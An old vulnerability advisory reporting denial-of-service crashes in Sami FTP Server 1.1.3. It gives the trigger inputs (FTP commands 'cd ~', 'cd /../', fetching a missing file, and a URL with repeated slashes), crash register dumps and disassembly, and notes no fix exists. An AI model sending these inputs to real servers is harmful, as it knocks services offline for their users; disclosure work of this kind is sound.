Application:  Sami FTP Server
              http://www.karja.com

Version:      1.1.3

Bug:          multiple vulnerabilities (Denial Of Service)

Author:       intuit
              e-mail: intuit@linuxmail.org
              web: rootshells.tk

              greetz to: zigzag ;)) 


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"KarjaSoft's Sami brand of servers strives to provide small and powerful solutions, incorporated into the Plugin Management System. Focusing on simple configuration and small size, the Sami products still provide the functionality needed for either company or personal use. Sami FTP Server is designed to provide a fully functional FTP server, while still keeping the simplicity. With a few clicks you will be ready to share your files!"


***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

(1)multiple vulnerabilities in commands: cd, get; 
(2)at inquiries of a kind: 
   ftp://user:pass@127.0.0.1/<many(2 and more) symbols "/">/
-----------------------------------------------------------------------

(1):
cd ~ 
cd /../ 
get <something unavailable>
(2):
ftp://user:pass@127.0.0.1////

-----------------------------------------------------------------------

crash a pmsystem.exe with error in module samiftp.dll.

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

(1):
The mistake occurs here:

-----------------------------------------------------------------------
AppName: pmsystem.exe   AppVer: 0.0.0.0   ModName: samiftp.dll
ModVer: 0.0.0.0   Offset: 0000ac53
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:
  
 EAX=00000000 EBX=00000002 ECX=00834AB4 EDX=00830608 
 ESI=00834AB4 EDI=00834AA8 EIP=008DAC53 ESP=0154FD48 
 EBP=0154FD70 EFL=00000202 
 CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000 
 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0

 00000008 = ????????

Code(Win XP Build 2600, Service Pack: None):

008DAC20   push        esi
008DAC21   mov         esi,ecx
008DAC23   mov         eax,dword ptr [esi+8]
008DAC26   test        eax,eax
008DAC28   je          008DAC44
008DAC2A   mov         eax,dword ptr [esi+4]
008DAC2D   push        eax
008DAC2E   call        008DA288
008DAC33   add         esp,4
008DAC36   mov         dword ptr [esi+4],0
008DAC3D   mov         dword ptr [esi+8],0
008DAC44   mov         ecx,8DAC70h
008DAC49   test        ecx,ecx
008DAC4B   je          008DAC62
008DAC4D   mov         eax,dword ptr [esp+8]
008DAC51   mov         ecx,esi
008DAC53   mov         edx,dword ptr [eax+8]    <<< [crash]
008DAC56   mov         eax,dword ptr [eax+4]
008DAC59   push        edx
008DAC5A   push        0
008DAC5C   push        eax
008DAC5D   call        008DA9E0
008DAC62   mov         eax,esi
008DAC64   pop         esi
008DAC65   ret         4


(2):
The mistake occurs here:

-----------------------------------------------------------------------
AppName: pmsystem.exe   AppVer: 0.0.0.0   ModName: samiftp.dll
ModVer: 0.0.0.0   Offset: 000036c7
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:
  
 EAX=01000000 EBX=00835270 ECX=02F4FD2F EDX=05920007 
 ESI=0083BC90 EDI=02F4FD2F EIP=008D36C7 ESP=02F4FDAC 
 EBP=02F4FDF4 EFL=00000202 
 CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000 
 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0

 01000000 = ????????

Code(Win XP Build 2600, Service Pack: None):

008D36A5   je          008D36AD
008D36A7   mov         eax,dword ptr [ecx]
008D36A9   push        1
008D36AB   call        dword ptr [eax]
008D36AD   lea         ecx,[ebp-2Ch]
008D36B0   call        008DA850
008D36B5   test        ebx,ebx
008D36B7   je          008D36C1
008D36B9   mov         eax,dword ptr [ebx]
008D36BB   push        1
008D36BD   mov         ecx,ebx
008D36BF   call        dword ptr [eax]
008D36C1   mov         eax,dword ptr [edi]
008D36C3   push        1
008D36C5   mov         ecx,edi
008D36C7   call        dword ptr [eax]    <<< [crash]
008D36C9   lea         ecx,[ebp-20h]
008D36CC   call        008DA850
008D36D1   lea         ecx,[ebp-14h]
008D36D4   call        008DA850
008D36D9   lea         ecx,[ebp-38h]
008D36DC   call        008DA850
008D36E1   pop         edi
008D36E2   pop         ebx
008D36E3   pop         esi
008D36E4   leave
008D36E5   ret         4

-----------------------------------------------------------------------

/*Tested on: Win XP Build 2600, Service Pack: None
             Win XP Build 2600, Service Pack: SP1  */
               
***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

Not exist.

***********************************************************************

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze